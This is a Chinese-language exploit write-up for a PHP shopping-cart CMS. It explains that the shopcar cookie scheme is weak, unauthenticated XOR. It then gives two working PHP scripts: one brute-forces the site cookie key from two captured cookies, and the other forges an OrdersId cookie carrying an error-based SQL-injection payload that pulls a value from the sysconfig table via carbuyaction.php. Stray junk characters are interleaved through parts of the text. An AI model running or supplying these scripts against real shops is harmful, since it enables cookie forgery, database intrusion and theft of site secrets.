www.xxx.com/plus/search.php?keyword=
在 include/shopcar.class.php 中。
先看一下 shopcar 类是如何生成 cookie 的：
/**
 * Persist a cart value as a browser cookie.
 *
 * Arrays are first flattened by enCode() (not shown here; the write-up says it
 * yields an a=yy&b=cc style string) and then, like scalars, passed through
 * enCrypt(). enCrypt()/setKey() below are a repeating-key XOR with no MAC, so
 * this is obfuscation, not authentication: anyone holding
 * md5(strtolower($cfg_cookie_encode)) can mint a cookie for any $key/$value
 * (the write-up later reads "OrdersId" back through getCookie()).
 *
 * @param string       $key   cookie name
 * @param string|array $value cookie payload
 */
function saveCookie($key,$value)
{
    if(is_array($value))
    {
        $value = $this->enCrypt($this->enCode($value));
    }
    else
    {
        $value = $this->enCrypt($value);
    }
    // 36000 s = 10 h lifetime, site-wide path; no secure/httponly flags are set.
    setcookie($key,$value,time()+36000,'/');
}
" ]* {3 G9 D+ d/ N, {# C& Y简单的说,$key就是cookie的key,value就是value,enCode的作用是将array类型转变为a=yy&b=cc&d=know这样的类型,关键是enCrypt函数% `% B$ X. s k1 J3 l8 {1 W& ~& N; o5 x
/**
 * "Encrypt" a cookie value: interleave a per-cookie key with the XORed
 * plaintext, then apply the site-wide XOR (setKey) and base64 it.
 *
 * Security notes (the basis of the attack described on this page):
 *  - The per-cookie key is md5(rand(0, 32000)): only 32001 possible values
 *    (rand() is inclusive at both ends), seeded from microtime.
 *  - Each key byte is written to the output in the clear right before the
 *    byte it masks, so $tmp = k0, p0^k0, k1, p1^k1, ...  Knowing the plaintext
 *    and brute-forcing the 32001 keys gives an attacker $tmp, and from $tmp and
 *    the cookie the setKey() key stream (see setKey below).
 *  - Output is exactly 2*strlen($txt) bytes before base64; there is no
 *    integrity check of any kind.
 *
 * @param string $txt plaintext (enCode() output for arrays, raw otherwise)
 * @return string base64 of setKey(interleaved stream)
 */
function enCrypt($txt)
{
    srand((double)microtime() * 1000000);
    $encrypt_key = md5(rand(0, 32000)); // 32 lowercase hex chars, 32001 candidates
    $ctr = 0;
    $tmp = '';
    for($i = 0; $i < strlen($txt); $i++)
    {
        $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr; // wrap the key index at 32
        // key byte in the clear, then plaintext byte XOR that same key byte
        $tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
    }
    return base64_encode($this->setKey($tmp));
}
/**
 * Site-wide XOR layer: XOR $txt byte-wise with the 32-character hex string
 * md5(strtolower($cfg_cookie_encode)), repeating the key every 32 bytes.
 *
 * XOR is its own inverse, so the same function decrypts. Consequences:
 *  - The key is the same for every cookie and the key index restarts at 0 on
 *    every call, so 32 known input bytes at offset 0 reveal the whole key:
 *    key = input[0..31] ^ output[0..31].
 *  - Nothing authenticates the result; a forged cookie is indistinguishable
 *    from a genuine one.
 *  - The key is the md5 hex digest, not $cfg_cookie_encode itself, so an
 *    attacker never needs the original secret.
 *
 * @param string $txt bytes to (de)obfuscate
 * @return string same length as $txt
 */
function setKey($txt)
{
    global $cfg_cookie_encode;
    $encrypt_key = md5(strtolower($cfg_cookie_encode));
    $ctr = 0;
    $tmp = '';
    for($i = 0; $i < strlen($txt); $i++)
    {
        $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr; // wrap at 32
        $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
    }
    return $tmp;
}
enCrypt 的参数 $txt（购物车明文）我们是可知的；返回值就是 cookie 的值，也是可知的。
然后看 enCrypt 调用 setKey 时传入的参数 $tmp。这个参数在某种意义上我们也是可知的：因为 $encrypt_key = md5(rand(0, 32000)) 只有 32001 种可能（rand 两端都是闭区间，穷举时写成 < 32000 会漏掉最后一个），我们可以穷举出 32001 种可能的 $tmp；把每一种 $tmp 的前 32 字节与 base64 解码后的 cookie 的前 32 字节异或，就得到 32001 种可能的 md5(strtolower($cfg_cookie_encode))——这一步成立是因为 setKey 就是纯异或，而且每次调用都从 key 的第 0 位开始。对了，忘记说了，我们的目的是推出 setKey 中 $encrypt_key 的值（需要的是这个 md5 值本身，不必知道 $cfg_cookie_encode），然后才能任意构造购物车的 cookie。从这 32001 个候选中，先过滤掉含有非字母数字字符的（md5 的输出只可能是 [0-9a-f]，按这个过滤会更严），就只剩下几百个可能的 key；然后再重新下一次订单，再得到几百个候选，两者取交集，就得到最终的 key。
具体代码如下:
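<?php
/*
 * Recover md5(strtolower($cfg_cookie_encode)), the 32-byte repeating XOR key
 * that shopcar.class.php::setKey() applies to every shopping-cart cookie.
 *
 * Why it works. enCrypt() emits, for each plaintext byte p[i], the pair
 *     k[i % 32], p[i] ^ k[i % 32]
 * where k = md5(rand(0, 32000)); setKey() then XORs that stream with the site
 * key (restarting at key offset 0) and base64-encodes it. So for the right
 * per-cookie index j:
 *     base64_decode($cookie)[0..31] ^ stream_j[0..31] == site key
 * Only 32001 values of j exist and the site key is 32 lowercase hex chars, so
 * we enumerate j, keep the candidates that look like an md5 digest, and
 * intersect the candidate sets of two independently generated cookies.
 *
 * Usage: set $cookie1/$cookie2 to two cookies generated for the SAME cart
 * plaintext, set $plantxt to that plaintext, run from the CLI.
 * Runs on PHP 5.4+ including 7.x/8.x (the original used eregi(), which was
 * removed in PHP 7).
 */

$cookie1 = "X2lRPFNlCmlWc1cvAHNXMABjAToHbVcyB3ZXJFIwA20LIAlzU2ULPARyAmQGIVU5VyJbfFVsBiYNN1dsUG0DIl90UTFTLAo3VjBXYgBvVzgAZAEqBz9XagclVzBSbw=="; // here is the first cookie,change here
$cookie2 = "ADYCb1RiBmUDJghwUyAFYlIxW2BROwhtVCUIe1AyC2UOJVMpADYBNgJ0AmRUcw5iAncAJ1JrCSlQalBrAj8CIwArAmJUKwY7A2UIPVM8BWpSNltwUWkINVR2CG9QbQ=="; // here is the second cookie ,change here
$plantxt = "id=2&price=0&units=fun&buynum=1&title=naduohua1"; // here is the text , change here

/**
 * XOR the first 32 bytes of the decoded cookie against the first 32 bytes of
 * a candidate enCrypt() stream; when the candidate is right, the result is
 * the setKey() key itself.
 *
 * @param string $code   base64 cookie value exactly as the server sent it
 * @param string $string candidate enCrypt() output (before setKey/base64)
 * @return string 32 raw bytes
 * @throws InvalidArgumentException when either input cannot supply 32 bytes
 */
function reStrCode($code, $string)
{
    $raw = base64_decode($code, true);
    if ($raw === false || strlen($raw) < 32) {
        throw new InvalidArgumentException('cookie must be valid base64 decoding to at least 32 bytes');
    }
    if (strlen($string) < 32) {
        throw new InvalidArgumentException('candidate stream must be at least 32 bytes');
    }
    // PHP's string ^ string XORs byte-wise over the common length.
    return substr($raw, 0, 32) ^ substr($string, 0, 32);
}

/**
 * Enumerate every per-cookie key index the server could have drawn and
 * return the candidate site keys that are plausible md5 hex digests.
 *
 * Only the first 16 plaintext bytes matter: enCrypt() produces two output
 * bytes per plaintext byte and reStrCode() inspects the first 32, so the
 * stream is built from substr($plantxt, 0, 16) and the key index never wraps.
 *
 * @param string $cookie  base64 cookie value
 * @param string $plantxt the plaintext enCrypt() was given (enCode() output)
 * @return string[] candidate keys (each is also echoed, one per line)
 * @throws InvalidArgumentException if $plantxt is shorter than 16 bytes
 */
function getKeys($cookie, $plantxt)
{
    if (strlen($plantxt) < 16) {
        throw new InvalidArgumentException('plaintext must be at least 16 bytes');
    }
    $head = substr($plantxt, 0, 16);
    $results = [];
    // rand(0, 32000) is inclusive at both ends: 32001 candidates, not 32000.
    for ($j = 0; $j <= 32000; $j++) {
        $k = md5((string) $j);
        $stream = '';
        for ($i = 0; $i < 16; $i++) {
            // same interleaving as enCrypt(): key byte, then plaintext ^ key byte
            $stream .= $k[$i] . ($head[$i] ^ $k[$i]);
        }
        $candidate = reStrCode($cookie, $stream);
        // md5() output is exactly 32 lowercase hex chars; anything else is noise.
        if (preg_match('/^[0-9a-f]{32}$/', $candidate)) {
            echo $candidate . "\n";
            $results[] = $candidate;
        }
    }
    return $results;
}

// Driver: only when executed directly, so the functions can be included elsewhere.
if (PHP_SAPI === 'cli' && isset($argv[0]) && realpath($argv[0]) === __FILE__) {
    $results1 = getKeys($cookie1, $plantxt);
    $results2 = getKeys($cookie2, $plantxt);
    print "\n--------------------real key--------------------------\n";
    // The genuine key is in both candidate sets; a false candidate would have
    // to survive the hex filter under two different random per-cookie keys.
    $common = array_values(array_unique(array_intersect($results1, $results2)));
    foreach ($common as $key) {
        echo $key . "\n";
    }
    if (count($common) !== 1) {
        fwrite(STDERR, count($common) . " candidates left; check \$plantxt or add a third cookie\n");
    }
}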
cookie1 和 cookie2 是我下了两次订单后分别生成的 cookie（两次订单的购物车明文必须一致）；
plantxt 可以根据页面自己推算，大概就是这个格式：id=2&price=0&units=fun&buynum=1&title=naduohua1。实际上只有前 16 个字节参与运算（reStrCode 只看前 32 字节，而 enCrypt 每个明文字节输出 2 个字节），所以 title 部分猜错也无妨，但 id、price、units 等前面的字段必须准确。
然后即可推算出 md5(strtolower($cfg_cookie_encode))。
得到这个 key 之后，我们就可以构造任意购物车的 cookie（整个方案没有任何完整性校验，伪造的 cookie 与真实的无法区分）。
接着看
8 W- d! N' n: c3 b; [20 class MemberShops r4 Z0 Z; ?# @+ T4 @, k
21 {
' i3 r5 ]. R# z, k( p22 var $OrdersId;
0 J8 J9 Y' N; V7 d x( {# g2 u# A23 var $productsId;
1 s& u! r% K9 D$ M) d0 k# }( _, y24
/**
 * Initialise the cart from the browser's cookies.
 *
 * OrdersId is taken verbatim from the "OrdersId" cookie. getCookie() is not
 * shown; presumably it is the decrypting counterpart of saveCookie() (setKey
 * + enCrypt above), which is forgeable once the site key is known, so this
 * value must be treated as attacker-controlled. Only when the cookie is empty
 * is a fresh id created by MakeOrders() (also not shown).
 */
function __construct()
{
    $this->OrdersId = $this->getCookie("OrdersId");
    if(empty($this->OrdersId))
    {
        $this->OrdersId = $this->MakeOrders();
    }
}
可以看到 OrdersId 是直接从 cookie 里取出来的（getCookie 应该就是 saveCookie 的解密对应方法，页面未给出），也就是说它是攻击者可控的。
然后看
/plus/carbuyaction.php 中的：
$cart = new MemberShops();
$OrdersId = $cart->OrdersId; // order id recorded for this request; it comes straight from the "OrdersId" cookie (MemberShops::__construct)
// ... intervening code omitted in the write-up ...
// $OrdersId is interpolated into the query text. The surrounding single quotes
// are the only barrier; whether getCookie()/GetOne() apply any escaping is not
// visible here, and the write-up's payload is built to get past it. The fix is
// a prepared statement with a bound parameter (and not trusting a forgeable
// cookie for the order id at all), not more escaping.
// "#@__" appears to be the table-prefix placeholder expanded by the DB layer.
$rows = $dsql->GetOne("SELECT `oid` FROM #@__shops_orders WHERE oid='$OrdersId' LIMIT 0,1");
$OrdersId 没有经过参数化或可靠的转义就被拼进了 SQL 语句，接着我们就可以注入了。
用下面的代码生成 OrdersId 这个 cookie（把 $encrypt_key 换成上一步推出的 key，$txt 就是注入语句）：
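<?php
/*
 * Forge a shopping-cart cookie once the setKey() key
 * (md5(strtolower($cfg_cookie_encode)), recovered by the companion script) is
 * known. setKey()/enCrypt() below mirror include/shopcar.class.php; because
 * the scheme is plain XOR with no MAC, the server accepts anything produced
 * this way, including the SQL-injection payload in $txt that is read back as
 * $OrdersId in /plus/carbuyaction.php.
 *
 * The payload uses the floor(rand(0)*2) / GROUP BY duplicate-entry technique
 * to extract `value` from #@__sysconfig (aid=3) through a database error.
 * Substitute your own query as needed; only $encrypt_key must match the
 * target. Runs on PHP 5.4+ including 7.x/8.x.
 */

$txt = "1' or 1=@`\'` and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select value from #@__sysconfig where aid=3),1,62)))a from information_schema.tables group by a)b) or 1=@`\'` or '1'='1";
$encrypt_key = "9f09293b7419ed68448fb51d5b174834"; // here is the key, please change here

/**
 * Site-wide XOR layer, identical to shopcar.class.php::setKey(): XOR $txt
 * byte-wise with the key repeated from offset 0. XOR is its own inverse, so
 * the same call decrypts.
 *
 * @param string      $txt     bytes to (de)obfuscate
 * @param string|null $siteKey 32-char md5 hex key; null = global $encrypt_key
 * @return string same length as $txt
 * @throws InvalidArgumentException if the key is empty
 */
function setKey($txt, $siteKey = null)
{
    if ($siteKey === null) {
        global $encrypt_key;
        $siteKey = (string) $encrypt_key;
    }
    $keyLen = strlen($siteKey);
    if ($keyLen === 0) {
        throw new InvalidArgumentException('site key must not be empty');
    }
    $len = strlen($txt);
    if ($len === 0) {
        return '';
    }
    // string ^ string in PHP is byte-wise and stops at the shorter operand, so
    // repeating the key to at least strlen($txt) reproduces the wrap-around.
    return $txt ^ str_repeat($siteKey, (int) ceil($len / $keyLen));
}

/**
 * Per-cookie layer, identical to shopcar.class.php::enCrypt(): emit
 * k[i % 32] followed by txt[i] ^ k[i % 32] for every byte, where
 * k = md5($keyIndex), then apply setKey() and base64.
 *
 * The server draws its index from rand(0, 32000) and never checks which one
 * was used, so the caller may pick any value in that range; a fixed index
 * gives reproducible output (see forgeCookie()).
 *
 * @param string      $txt      plaintext to encode
 * @param int|null    $keyIndex per-cookie key index 0..32000; null = random
 * @param string|null $siteKey  passed through to setKey()
 * @return string base64 cookie value
 */
function enCrypt($txt, $keyIndex = null, $siteKey = null)
{
    if ($keyIndex === null) {
        $keyIndex = rand(0, 32000); // same range as the server; PHP seeds rand() itself
    }
    $cookieKey = md5((string) $keyIndex); // 32 lowercase hex chars
    $len = strlen($txt);
    $stream = '';
    for ($i = 0; $i < $len; $i++) {
        $kb = $cookieKey[$i % 32];
        $stream .= $kb . ($txt[$i] ^ $kb);
    }
    return base64_encode(setKey($stream, $siteKey));
}

/**
 * Produce a cookie value that contains no '+'.
 *
 * The original looped on random keys until it got lucky (and its !strpos()
 * test accepted a '+' at offset 0). Here the 32001 possible key indexes are
 * tried in order, so the result is deterministic and the loop always ends.
 * '+' is avoided because PHP url-decodes cookie values into $_COOKIE, which
 * turns '+' into a space and corrupts the decrypted payload; presumably that
 * is why the original avoided it. Long payloads rarely base64 to a '+'-free
 * string, so the fallback percent-encodes the value instead, which the same
 * url-decoding undoes on the server.
 *
 * @param string      $txt     plaintext to encode
 * @param string|null $siteKey passed through to setKey()
 * @return string cookie value safe to send as-is
 */
function forgeCookie($txt, $siteKey = null)
{
    for ($j = 0; $j <= 32000; $j++) {
        $cookie = enCrypt($txt, $j, $siteKey);
        if (strpos($cookie, '+') === false) {
            return $cookie;
        }
    }
    return rawurlencode(enCrypt($txt, 0, $siteKey));
}

// Driver: only when executed directly, so the functions can be included elsewhere.
if (PHP_SAPI === 'cli' && isset($argv[0]) && realpath($argv[0]) === __FILE__) {
    echo forgeCookie($txt) . "\n";
}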